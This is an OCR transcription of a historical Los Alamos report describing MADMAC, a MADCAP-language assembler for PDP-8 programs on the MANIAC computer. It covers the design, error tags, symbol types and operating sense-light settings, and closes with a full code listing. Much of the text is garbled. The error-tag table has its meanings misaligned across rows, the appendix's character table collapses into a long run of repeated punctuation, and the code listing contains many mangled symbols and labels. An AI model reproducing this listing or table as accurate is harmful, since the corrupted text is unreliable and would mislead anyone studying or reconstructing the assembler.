MADMAC, A MADCAP Version of DEC Code MACRO-8 for Assembling PDP-8 Codes on MANIAC DISCLAIMER This report was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor any agency thereof, nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise does not necessarily constitute or imply its endorsement, recommendation, or favoring by the United States Government or any agency thereof. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof. DISCLAIMER Portions of this document may be illegible in electronic image products. Images are produced from the best available original document. This report expresses the opinions of the author or authors and does not necessarily reflect the opinions or views of the Los Alamos Scientific Laboratory. MADMAC, A MADCAP Version of DEC Code MACRO-8 for Assembling PDP-8 Codes on MANIAC by Allen C. Larson THIS PAGE WAS INTENTIONALLY LEFT BLANK MADMAC, A MADCAP VERSION OF DEC CODE MACRO-8 FOR ASSEMBLING PDP-8 CODES ON MANIAC by Allen C. Larson ABSTRACT An assembler for PDP-8 codes written in a subset of the DEC-MACRO-8 language has been entirely written in the Maniac compiler language MADCAP. This assembler will accept input from cards or paper tape. The paper tape can either be punched in the Maniac character code or in the ASCII character code. The major difference between MACRO-8 and MADMAC is that MADMAC does not have the macro pseudo-op. INTRODUCTION A Digital Equipment Corporation PDP-8 computer has been purchased to control an X-ray diffraction unit at Los Alamos Scientific Laboratory. The assemblers provided by the manufacturer require that the symbolic code being assembled be read in three times to provide both the binary code and a listing. This is a time-consuming process because the only input to this PDP-8, as it exists now, is an ASR-33 teletype unit that has a character read rate of only 10 characters/second. Dr. W. Busing at ORNL has written a FORTRAN and machine language assembler (PALFTN) for use on the CDC-1604. A copy of this code was obtained and used as the starting point for writing MADMAC, a MADCAP version of MACRO-8, the most sophisticated assembler available for the PDP-8. In this report it is assumed that the reader is familiar with the PAL-III and MACRO-8 languages as described in the manuals published by the Digital Equipment Corporation and that he has a working knowledge of the MADCAP language. DESCRIPTION The MADCAP language is ideal for writing purely logical codes such as an assembler. The language provides for manipulation and examination of bits, which makes a character-by-character scan of a character string a straightforward process. The basic premise of MADMAC is that it will duplicate all features of PAL-III and MACRO-3 except the use of macro definitions. (PALFTN will accept only a subset of the PAL-III language.) A few additions, such as the pseudo-ops FLTG and DUBL in literal definitions, have been made to the MADMAC language beyond those described as available in MACRO-8. MADMAC reads the symbolic code one line at a time, stores the code for a complete scan and listing on the second pass, and then performs an initial scan of the line to determine whether there are any symbols defined by the statements on the line. If so, it defines them and adds them to the symbol table. After the complete symbolic code has been read in, all symbols defined, and no errors detected, MADMAC rescans each statement, creates the desired code, and prints a listing. When the second pass is completed the assembler lists the symbols that were defined by the code and gives their values. The literals are then listed with their locations, and, finally, the new code is punched in a format suitable for the FDP-5 binary loader. The initial scan of a statement is halted when a symbol not terminated by a comma or equal sign is detected. Termination of the scan in the second pass depends on the type (see below) of the first symbol in the statement. The scan continues to the end of the statement if the symbol is type 1 or 2, is terminated immediately if type 4, is terminated by the first space encountered after a symbol defining the address has been read if type 5, and is terminated by the first space encountered if type 0. The end of the statement is defined as a semicolon, a slash, or the end of the line. On cards, "$" indicates the end of a statement. Thus more than one statement can be on a card. In addition to the above conditions for terminating a scan, the scan of a type 8 statement will be terminated after the first literal in the statement has been evaluated. Comments may follow a slash. The end of the code is indicated by the symbol $ appearing as the first non-blank character in the statement. Symbols can be constructed from any characters in the chosen character set (keypunch, ASCII, etc.). They must not begin with a number smaller than 8, and will be terminated by the first control character encountered. The control characters and their interpretations are: <table> <thead> <tr> <th>Error Tag</th> <th>Meaning</th> <th>Result</th> </tr> </thead> </table> | 0 | undefined symbol | It was given a value of 0 (except ignored if after * )/. | 1 | redefined symbol | The new value was stored. | | 2 | an operator was followed | If after * or = the whole line is ignored; | | 3 | by spaces or comment | if after + or - a 0 was probably used. | | 4 | illegal operation | The address was set to page 0, cell 0. | | 5 | address missing on an | The value of the symbol was computed | | 6 | order requiring an | incorrectly. | | 7 | address in an octal | Scan of statement terminated; first symbol | | 8 | number on a literal | used for the code. | | 9 | illegal combination of | An address of 0 was used. | | 10 | permanent symbols | They were combined. | | 11 | indirect address error | Indirect page reference to symbols on a page | | 12 | (an I or z was followed | other than current or zero page. | | 13 | by nothing) | A previously defined word of code was | | 14 | illegal page reference | overwritten. | | 15 | code word changed | The second period terminated the number. | | 16 | 2 periods were encountered | The plus sign was ignored. | | 17 | in an FITG number | | | 18 | a minus sign was followed | | | 19 | by a plus sign | | TABLE II. CLASSIFICATION OF SYMBOLS <table> <thead> <tr> <th>Symbol Type</th> <th>Description and allowed use</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>All programmer defined symbols are of this type. They can be used in any manner the programmer wishes.</td> </tr> <tr> <td>1</td> <td>Group 1 operate instructions. They can only be combined with other group 1 operate instructions.</td> </tr> <tr> <td>2</td> <td>Group 2 operate instructions. These can only be combined with other group 2 operate instructions.</td> </tr> <tr> <td>3</td> <td>Memory reference instructions. All should have addresses, otherwise the address will be 0.</td> </tr> <tr> <td>4</td> <td>Instructions that cannot be modified or combined. The I/O orders fall in this group.</td> </tr> </tbody> </table> A listing of the MADCAP code for MADMAC is given in the Appendix. MADMAC is different from MACRO-9 in several important respects. These are: - MADMAC does not recognize macros. - MADMAC does not allow nested literals. - MADMAC assumes a literal is decimal unless told otherwise by an O following the parentheses (or following a minus sign if negative). - MADMAC literals must be numbers, not symbols. - MADMAC literals may be floating point numbers if defined by FLTG or double precision if defined by DUBL. The radix control in MADMAC is always octal. - MADMAC does not need EXPUNGE. - MADMAC does not recognize PAUSE. - MADMAC, at present, only recognizes +, - and space as operators in forming expressions. OPERATING INSTRUCTIONS Sense lights 0, 1, 2, 3, 4, 5, and 6 are used to indicate the location and type of input, to control code punching, and to control code processing and listing. The sense lights will be set before reading of the code begins and may be set for the next code as soon as reading has started. The indicated control for the sense lights is: - 0 on for card deck. - 1 on for "Japanese" flexo paper tape. - 2 on for ASCII paper tape. - 3 off to read next code after punch out without stopping. - 4 on to punch out only after "$". The computer will stop at of-100 on this option even if 3 is off. 5 on to perform pass 2 even though errors were detected in pass 1. 6 on to include the permanent symbols in the symbol table listing. The location of secondary codes to be assembled into one program can be further controlled by a character following "$" in the last card in the deck. The character 0 indicates that the next code is on cards; a 1, on paper tape in "Japanese" flexo code; a 2, on paper tape in ASCII code; and a blank indicates that the sense lights will be examined to locate the next code. The secondary codes must be complete in themselves, although they may have the page and location counter preset. The FDP-3 memory load and all location counters are reset after a code has been punched out. The complete permanent symbol table can be changed only when a request for its location is printed on the MK-III. If the track is typed as 0 0 0 0, a new symbol table will be read in from cards; if the track is typed as a number less than 7500, track 7598 will be used. Track numbers larger than 7599 are illegal. Individual symbols in the permanent symbol table can be redefined with the equal sign. An error "rds" will then be printed in the margin, and sense 5 must be on to assemble the code (sense 5 deletes the test on errors detected in the first pass, which would provide only a listing of the symbolic deck and the first pass errors). The MADMAC code, as a binary tape including a "standard" permanent symbol table, is available from the author. APPENDIX Listing of the MADCAP code MADMAC All quotation marks except those enclosing comments were in red in the original listing. All other symbols that were red in the original listing are underlined here. For explanation of the red symbols, see the MADCAP manual. "Madcap Code to assemble PDP-8 Codes" (word-set)Symbol to 500 (word-set)Octet to 500 (80 characters)Stmt to 2000 (word-set)decimal() (word-set)symbol() (real)search() (string)rdasci() (word-set)find() (real)equatr() (real)equate() (word-set)octal() (word-set)literal() (word-set)A, B, Ow, Smb, S, S1 (word-set)fltpt() (word-set)dblp() Err to 2000 (4 characters)Erms to 15 is [" ","uds","rds","nop","iop","itr" cont. ","ich","nco","iae","g12","pge","cwc","2.s","","+a-","" ] t = 0 (word-set)C0 to 4095 Lt, Lc, Ld to 48 new page print: "set sense 0 on for cards, 1 on for JAP flexo tape," cont. " 2 on for ASCII code" print: "set sense 3 on to punch after $$ only" print: "if sense 3 is off, turn sense 4 on to" cont. " stop after code is punched" print: "all above sense lights may be reset for" cont. " the next code after reading starts" print: "sense 5 on to ignore pass 1 errors, can be set at anytime" print: "sense 6 on to list the permanent symbols in symbol table " 6 stop #1 #3 Flag = 0 read console by "Symbol table is on track dddd": x if x > 0, go to #10 i = 0 #1 new card read card by "c6(06)2": Symb1, A, B Octeq1 = (A*12) + [(B*4) + (16)] Symb1 = Symb1 x 3f3f3f3f3f3f if Symb1 = 101010101010, go to #2 i = i+1 go to #1 type: "if symbol table is to be written on disk" read console by "type initial track no x":x if x > 7500 write 2 tracks x, #088 1 for j = 0 to i Symbj, Octeqj go to #11 #10 if x < 7500, then x = 7598 read 2 tracks x, #088 1 for j = 0 to i Symbj, Octeqj #11 Pertab = 1 "Permanent table length" #13 for i = 0 to 45: Lt1, Lc1 = 0 Page = 1 for i = 0 to 4096: Cd1 = (20) #12 Itab = Pertab Ierr, Ng = 0 for i = 0 to 45: Ld1 = Lc1 Dpage = Page End = 0 Lite = bank if Flag = 0: Type = ordinal(Lite\times3)-1 n = 0 "# of statements read" #20 if Type = 0 new card read card: Stmt\_n go to #25 if Type = 1 read: Stmt\_n go to #25 Stmt\_n = rdasc1() #25 (672 elements)String = Stmt\_n Err\_n = 0 Pass = 1 j,t = 0 execute iscan() if Err\_n > 0: Ierr = Ierr+1 if End > 0, go to #27 if j > 0 n = n+1 go to #20 if Smbx3f3f3f3f3f3f3f3f3f3f3f3f3f3f3f = 0ef5e0b25101111 Lc\_Page = Lc\_Page+2 if Smbx3f3f3f3f3f3f3f3f3f3f3f3f3f3f3f = 0d2e0b251010 Lc\_Page = Lc\_Page+1 execute wrapup() if j > 0, go to #26 n = n+1 go to #20 #27 if End > 1, go to #700 if sense 5 is on, go to #100 if Ierr > 0 Ipg = 0 for j = 0 to n-1 if (j(mod 60)) = 0 new page print: date print by "Error tag(,)30Statement(,)30Page X": Ipg Ipg = Ipg+1 print by ",(,)3m3(,)6m80":Errs_Err Stmt_j print by ",/x4,errors were detected in pass 1": Ierr go to #13 #100 n = -1 "Second pass" End = 0 Pass = 2 Ipg = 1 for i = 0 to 32: Lc_i = Ld_i Page = Dpage Line = 0 Fpt, Dbl, Cdc = 0 #110 n = n+1 Strng = Stmt_n Sc = 0 Lf = 1 j = 0 #115 Ow = 0 t = 0 if Fpt > 0 execute spaces() A = Strng*8 if ordinal(A) > 9 Fpt = 0 go to #116 Cdc = 36 Ow = fltgpt() go to #400 if Dbl > 0 execute spaces() A = string 6 if ordinal(A) > 9 Dbl = 0 go to #116 Ow = dblp() Cdc = 24 go to #400 #116 t = 0 execute iscan() if j > 0, go to #500 if End > 0, go to #600 if Smb = 101010101010 if t < 4 Err_n = 4 go to #500 r = t execute spaces Ow = find(symbol()) if r = 5: Ow = subset(ordinal(12-Ow)+1) if Ng > 0 Err_n = 1 go to #400 if Smbx3f3f3f3f3f3f3f3f=0f252d201010 "fltg" Fpt = 1 Cdc = 36 Ow = fltgpt() go to #400 if Smbx3f3f3f3f3f3f3f3f3f=9d2e0b251010 "dubl" Dbl = 1 Cdc = 24 Ow = dblp() go to #400 Ow = find(Smb) if Ng > 0 Err_n = 1 "undefined symbol" go to #400 "store and print" if Ow > (19), go to #400 "no modification allowed" if Ow > (18) execute spaces() if J > 0 Err_n = 5 go to #400 if Strngx16 = 4949 Strng = Strng-(8) go to #160 if Strngx7 = 49 "a current page literal" Ow = Ow+80 Lpg = Page go to #17 if Strngx7 = 44 "a zero page literal" Ow = Owx.................. Lpg = 0 #160 A = literal() #17 for j = 1 to Lt_Lpg if A = Cd_{128}(Lpg+1)-J if A-(12) = 1, go to #18 if A-(24) = 1 J = J+1 go to #18 if A-(36) = 1 J = J+2 go to #18 #17 Lt_Lpg = Lt_Lpg+1 j = Lt_Lpg if Cd_{128}(Lpg+1)-J \neq (20) Err_n = 11 Cd_{128}(Lpg+1)-J = A A = A-(12) if A#1, go to #170 #118 Ow = Ow+subset(128-j) go to #400 #120 S = symbol() if Sx3f3f3f3f3f3f = 221010101010 Ow = Ow+100 "set indirect bit" #130 execute spaces() if j = 0, go to #120 Errn = 8 "indirect address error" go to #400 if Sx3f3f3f3f3f3f = 331010101010 Ow = Ow_ffffff A = find(S) if Ng > 0 Errn = 1 "undefined symbol" go to #400 #135 if t > 3 execute spaces() if j = 0 r = t B = find(symbol()) if Ng > 0: Errn = 1 if r = 5: B = subset(ordinal(12-B)+1) A = subset(ordinal(A)+ordinal(B)) go to #135 Errn = 3 Wpage = ordinal((A-(7))x5) Rp = Page if LcPage = 0: Rp = Rp-1 if Rp = Wpage Ow = Ow+(A+x7)+(7) go to #400 if Wpage = 0 Ow = Ow+(Ax7) go to #400 if Ow < (A) A = (Ax12)+(12) Lpg = Page Ow = Ow+(8,7) go to #1171 Err_n = 10 go to #400 if Ow %16,17 ≠ 0 if t > 3, go to #135 execute spaces() if j > 0, go to #400 A = find(symbol()) if Ng > 0 Err_n = 1 go to #400 if (Ow\(\times\)(16,17) ≠ 0 Err_n = 9 "Group 1 and Group 2 operate" Ow = Ow+A go to #150 #160 if t > 3 execute spaces() if j > 0 Err_n = 3 go to #400 r = t A = find(symbol()) if Ng > 0: Err_n = 1 if r = 5: A = subset(ordinal(12-A)+1) Ow = subset(ordinal(A)+ordinal(Ow)) go to #160 "presently codes without bits 16, 17 or 18 = 1" "will not be modified" #400 1 = 120 x Page + Lc Page - 1 if Cdl > (20) Errn = 11 "code word changed" if Cdc > 0 Cdc = Cdc - 12 Cdl = (word-set Ow - (Cdc)) x 12 if Cdc > 0, Lc Page = Lc Page + 1 go to #500 Cdl = Ow #500 if (Line(mod 60)) = 0 new page print by "x": date print by "Error, tag, Lc, Code, 15 Statement, 30 Page, x": Tpg Tpg = Tpg + 1 Line = Line + 1 A = subset (1) if Lf > 0 print by ",, m3 (x) 1 am a 0", Errn, Stmt n go to #110 if Cdl > (18) Sl = Cdl - (2) B = Sl - (1) S = B - (1) Ow = Cdl x 7 if Sc > 0 if Cdl > (18) print by ",, m3 (x) 50 4 , a (b) 2 363" Errn, A, S, B, Sl, Ow go to #590 print by ",, m3 (x) 50 4 , a 4": Errn, A, Cdl go to #590 if Cdc > 0 Err_n = 0 Sc = 1 go to #400 execute wrapup() if j > 0 Sc = 1 Err_n = 0 go to #115 go to #110 #600 Line = 0 "print reference table" i = Pertab+1 if sense 6-1n am: i = 0 for j = i to Itab if (Line(mod 60)) = 0 new page print by "X": date print by "Symbol[,]5Value[,]15Reference[,]30Page,X": Ipg Ipg = Ipg+1 (6 character)Stg = "s"s"s"s"s"s"s"s"s"s" S = Symb_j for i = 0 to 5 (1 character)Strg = (3x8)i(48-8) S = S-(8) Stg = Strg+Strg, print by "m6[,]6s4[,]9[,]64,12": Stg, Octeq_j Line = Line+1 if Lite > (3), go to #12. #700 Line = 0 for j = 0 to 31 if Lt_j > 0 for i = Lt_j, Lt_j-1,...,1 A = subset(128(j+1)-1) if (Line(mod 60)) = 0 new page print by "x": date print by "Loc,,,Value(j)30x": Ipg Ipg = Ipg+1 Line = Line+1 print by "n4, ,04": A, Cd_{128(j+1)-1} for j = 0 to 99 "punch out code" | 93 (00) Cksum = 0 "check sum = 0" Orig = 0 for j = 0 to 4095 if Cd_j = (20) Orig = 0 loop back if Orig = 0 A = subset(j) B = [(A-(6))×6]+(6) A = A×6 Cksum = Cksum+ordinal(A)+ordinal(B) | 93 (B) | 93 (A) Orig = 1 A = Cd_j×12 B = A-(6) A = A×6 Cksum = Cksum+ordinal(A)+ordinal(B) A = subset(Cksum) B = (A-(6))x6 A = Ax6 for j = 0 to 100 if Litex(3,4) = 0, go to #13 stop #100 go to #3 "iscan, procedure to scan initial portion of stmt" (... iscan(); all) (word-set)Pge is 200a200c1010 (word-set)Cls is 3f3f3f3f3f3f (word-set)Val #26 execute spaces() if j = 1, go to exit "entire string was spaces or tabs" if Stringx7=(0,6) "an asterisk" String = String - (8) execute spaces() if j > 0 Errn = 3 go to exit Smb = symbol() go to #50 "Symbolic location" if Stringx24 = 78566c End = 1 go to exit if Stringx6=5 "$ or super stop code" Flag = 0 if Stringx 3f3f = 1f1f "2 $ or super stop codes" End = 2 go to exit End = 1 A = (Strng-(8))×8 if ordinal(A) < 3 Type = ordinal(A) Flag = 1 go to exit Smb = symbol() if Smb×Cla=Page execute spaces() if j = 1 Page = Page+1 "nothing after page on the line" go to exit Smb = symbol() Val = find(Smb) if Ng > 0 Err, = 1 Page = ordinal(Val) if t > 3 r = 6 execute spaces() Smb = symbol() A = find(Smb) if Ng > 0 Err, = 1 if r = 4: Page = Page+ordinal(A) if r = 5: Page = Page-ordinal(A) j = 1 go to exit if t = 1, go to #45 "Smb terminated by sp., etc" if t = 2 "Smb was terminated with a," if Pass = 2, go to #26 Ng = equalr(Smb, 128×Page+LePage) if Ng > 0 Err_n = 2 go to exit go to #26 if t = 3 "Smb was terminated with an =" if Pass = 2 j = 1 go to exit execute spaces() if j = 1 "error" Err_n = 3 go to exit S = symbol() if S-(40) = 39 A = subset(Page128+Lc_page) go to #33 A = find(S) if Ng > 0 "error" Err_n = 1 go to exit #33 if t-2 ≠ 0 Ow = (7) #34 execute spaces() if j > 0, go to #40 S1 = symbol() if S1×3f3f3f3f3f3f = 221010101010 A = A+(8) go to #34 if S1×3f3f3f3f3f3f = 331010101010 Ow = 0 go to #34 B = find(S1) if Ng > 1 "error" Errn = 1 go to exit if r = 4 A = subset(ordinal(A)+ordinal(B)) go to #34 if r = 5 A = subset(ordinal(A)+ordinal(12_B)+1)x12 go to #34 #35 if A > (18) A = A+(Bx7)+ow go to #34 A = A+w go to #34 #40 Ng = equato(Smb,A) if Ng > 0 Errn = 2 go to exit Errn = 4 go to exit #45 if LcPage > 127 Page = Page+1 LcPage = -1 LcPage = LcPage+1 Lc = 0 go to exit #50 A = find(Smb) "define a symbolic loc." if Ng > 0 Errn = 1 go to exit "error" x = ordinal(A) if t > 4 r = t execute spaces() S = symbol() A = find(S) if r = 4: x = x+ordinal(A) if r = 5: x = x-ordinal(A) if x < 0: x = x+4096 Page = ordinal(subset(x)-(7)x5) LC_page = x(mod 128) j = 1 ... "Procedure to read ASCII tapes and convert to string" "max 80 character / string" (... rdasci() (string)St (word-set)Blank is hex ffffffff (1 character)Char0 to 63 is ["\",",""","",","","","",","",","",","",",","",","",","] cont. "g","h","i","j","k","l","m","n","o","p","q","r","s" cont. "t","u","v","w","x","y","z","[","]","\"," cont. ",",","\",",","\",",","\",",",","\",",",","\",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",",","}k = 0 (word-set) I St = Blank #1 | 91 (I) if I=(0,2,3,7), go to #2 if I = 8, go to #1 if ordinal(I) < 160, go to #1 "illegal character" k = k+1 if k > 80, go to #1 I = I*8 j = ordinal(I) St = St+Char_j go to #1 #2 rdasci() = St ...} "equate octal, procedure to assign octal equivalent to a symbol" "octal to octal" (... equato(S,V; Octeq,Symb,Itab) (word-set)S,V (real)m Ng = 0 m = search(S) if m ≥ 0 Ng = 1 go to #1 Itab = Itab+1 octeq,Itab = V Symb,Itab = S #1 equato() = Ng ...) "octal, procedure convert an octal symbol to an octal #" (... octal(Smb; Ng) (word-set)Smb Ng = 0 i = 0 (word-set)O = 0 j = 0 A = 3mb #1 if A≥(4) A = A-(8) go to #1 #2 if A = 0, go to #3 if A ×(8-3) ≠ 0 Ng = 1 go to #3 O = O+(word-set A×3+(j)) j = j+3 A = A-(8) go to #2 #3 octal() = 0 ... "equate real, procedure to assign octal equivalent to a symbol" "real to octal" (... equatr(S,V; Octeq, Symb, Itab) (word-set)S (real)m Ng = 0 m = search(S) if m ≥ 0 Ng = 1 go to #1 Itab = Itab+1 Octeq,Itab = subset(V) Symb,Itab = S #1 equatr() = Ng ...) "Procedure to search for end of statement" (... wrapup(; i,j,Strng) j = 0 #1 (word-set)A = Strng\textsubscript{24} if A\textsubscript{8} = ff, go to exit if A\textsubscript{8} = 36, go to exit if A = 755643, go to #2 if A = 435675, go to #2 Strng = Strng-(8) if A\textsubscript{8} = 5 j = 1 go to exit go to #1 #2 j = 1 Strng = Strng-(24) ...) "Procedure to skip spaces and tabs" (... spaces(;i,j,Strng) j = 0 #1 (word-set)A = Strng - 8 if A = 6 = (4), go to #2 "Spaces" if A = 43, go to #3 "semicolon" if A = 4 = (4,2,1,0), go to #2 "tab" if A = 36, go to #3 "/" if A = 8, go to #3 go to exit #2 Strng = Strng - (8) go to #1 #3 j = 1 ... "find, procedure to determine the octal equivalent" "of a symbol" (... find(S; Ng, Page, Lc, Octeq, Err, n) (word-set)S, (word-set)V (real)m if S = (6-43) = 0 V = octal(S) if Ng > 0. Errn = 6 Ng = 0 find() = V go to exit Ng = 0 if S = (40) = 39 find() = subset(128xPage + Lc - Page - 1) go to exit m = search(S) if m < 0 Ng = 1 go to exit find() = Octeq_m ... "Procedure to read a literal" (... literal(); all) Strng = Strng-(8) execute spaces() if Strngx3f3f3f3f = 202d250f Strng = Strng-(32) execute spaces() if j > 0 Errn = 6 go to #1 A = fltgpt()+{36} go to #1 if Strngx3f3f3f3f = 250b2e0d Strng = Strng-(32) execute spaces() if j > 0 Errn = 6 go to #1 A = dhlp()+{24} go to #1 m = 0 if Strngx8 = 35 m = 1 Strng = Strng-(8) if Strngx8 = 34 if m = 1: Errn = 14 Strng = Strng-(8) Smb = symbol() A = Smb-{40} if Ax6 = 28 A = octal(Smb+{8}+{4}) if Ng > 0 Errn = 6 go to #2 A = decimal(Smb) #2 if m = 1: A = subset(ordinal(12-A)+1) A = (A*12)+(12) #1 literal() = A ... "decimal to octal conversion" (... decimal(A; Err, n) (word-set)A C = 0 E = 1 #1 if AX6 = {4} A = A-{8} go to #1 #2 if AX6 = 0, go to #3 B = AX6 D = ordinal(B) if D > 9 Err_n = 6 go to #4 C = C+DxE F = 10E #4 A = A-{8} go to #2 #3 decimal(A;Err,n) = subset(C) ... "symbol, procedure to extract symbols from the string" (... symbol(;i,t,String) u = 0 t = 1 (word-set)Sm, Ch #1 Ch = Stringx8 if Ch > 5, go to #100 "if or 1f" if Ch = 43, go to #100 ";" if Ch = 44, go to #100 "]" if Ch = 39, go to #100 if Ch = 36, go to #100 if Ch = 38 if u = 0 u = 1 Sm = Ch Strng = Strng-(8) goto #1 go to #100 Strng = Strng-(8) if Ch = 32, go to #100 "Space" if Ch = 13, go to #2 "comma" if Ch = 33, go to #3 "equal sign" if Ch = 34, go to #4 "plus sign" if Ch = 35, go to #5 "minus sign" if Ch = 17, go to #100 "tab" if Ch = 41, go to #100 ") if Ch = 45, go to #100 "]" u = u+1 if u < 7 Sm = (Sm+(8))+Ch go to #1 #2 t = 2 "Symbol is a location" go to #100 #3 t = 3 "Symbol is to be defined" go to #100 #4 t = 4 goto #100 #5 t = 5 #100 for i = u to 5 Sm = (Sm+(8))+t(4) symbol() = Sm ... "fltgpt, procedure to extract a floating point #" execute spaces() m = 0 if Strng×8=35 "minus" Strng = Strng-(8) m = 1 p, e = 0 e = 0 q = 0 (word-set)A, B #1 B = Strng×8 C = ordinal(B) if C > 9 if C = 57 if p > 0 Err_n = 12 "2 period" go to #10 p = .10 go to #3 #2 if C = 30, go to #10 "spaces" if C = 64, go to #9 ")" if C = 69, go to #9 "]" if C = 63, go to #10 "}". if C = 54, go to #10 "/". if C = 255, go to #10 "ff" if (C(mod 64)) = 14, go to #5 "e" Err_n = 6 "illegal characters" go to #10 #2 if p = 0 e = e×10+C go to #3 #3 Strng = Strng-(8) go to #1 #5 Strng = Strng-(8) execute spaces() if j > 0 Errn = 3 go to #10 if Strngx8=35 e = 1 Strng = Strng-(8) if Strngx8=34 if e > 0 Errn = 14 "follows-" Strng = Strng-(8) #6 B = Strngx8 C = ordinal(B) if C > 9, go to #10 q = qx10+c Strng = Strng-(8) go to #5 #9 Strng = Strng-(8) #10 if e > 0: q = -q o = ox(10)q A = word(o)x43 (REAL) x = [word(o)x(47-44)-(17)]+[word(o)x(47)-(4)]+(44) x = 16(x-1) #12 if (43-27)xA 0 A = A-(1) x = x+1 go to #12 A = A-(4) if x < 0: x = x+4096 if m > 0: A = subset(ordinal(24-A)+1) fltgpt() = (A+(subset(x)+(24))x36 ...)} "dblp, procedure to extract a double precision integer" (... dblp(Strng, Err, n, j) execute spaces() if j > 0 Errn = 3 go to exit p = 0 m = 0 if Strngx8 = 35 m = 1 Strng = Strng(8) if Strngx8 = 34 if m > 1: Errn = 14 Strng = Strng(8) #4 (word-set)A = Strngx8 b = ordinal(A) if b > 9 if b = 64, go to #9 if b = 69, go to #9 p = px10+b Strng = Strng(8) go to #i #9 Strng = Strng(8) #10 A = subset(b) if m > 0: A = subset(ordinal(24-A)+1) dblp() = Ax24 ... ) "search, procedure to locate a predefined symbol" (... search(S; Symb, Itab) (word-set)S for m = 0 to Itab if (S=Symb_m)x3f3f3f3f3f3f3f3=0 go to #i m = -1 #1 search() = m ... )
{"Source-Url": "https://digital.library.unt.edu/ark:/67531/metadc1033489/m2/1/high_res_d/4573207.pdf", "len_cl100k_base": 11525, "olmocr-version": "0.1.50", "pdf-total-pages": 34, "total-fallback-pages": 0, "total-input-tokens": 80326, "total-output-tokens": 13595, "length": "2e13", "weborganizer": {"__label__adult": 0.0004391670227050781, "__label__art_design": 0.0006604194641113281, "__label__crime_law": 0.0004839897155761719, "__label__education_jobs": 0.0005598068237304688, "__label__entertainment": 0.0001176595687866211, "__label__fashion_beauty": 0.00020205974578857425, "__label__finance_business": 0.0002713203430175781, "__label__food_dining": 0.00039458274841308594, "__label__games": 0.0009565353393554688, "__label__hardware": 0.01416778564453125, "__label__health": 0.00029206275939941406, "__label__history": 0.0002332925796508789, "__label__home_hobbies": 0.0001842975616455078, "__label__industrial": 0.0024089813232421875, "__label__literature": 0.0002061128616333008, "__label__politics": 0.00023627281188964844, "__label__religion": 0.0005822181701660156, "__label__science_tech": 0.1004638671875, "__label__social_life": 5.936622619628906e-05, "__label__software": 0.0250091552734375, "__label__software_dev": 0.85107421875, "__label__sports_fitness": 0.0002799034118652344, "__label__transportation": 0.0005283355712890625, "__label__travel": 0.00013017654418945312}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31496, 0.10375]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31496, 0.97993]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31496, 0.86416]], "google_gemma-3-12b-it_contains_pii": [[0, 82, false], [82, 968, null], [968, 1116, null], [1116, 1272, null], [1272, 1375, null], [1375, 1414, null], [1414, 4206, null], [4206, 7552, null], [7552, 11316, null], [11316, 12300, null], [12300, 13013, null], [13013, 13711, null], [13711, 14312, null], [14312, 14920, null], [14920, 15649, null], [15649, 16280, null], [16280, 16945, null], [16945, 17765, null], [17765, 18372, 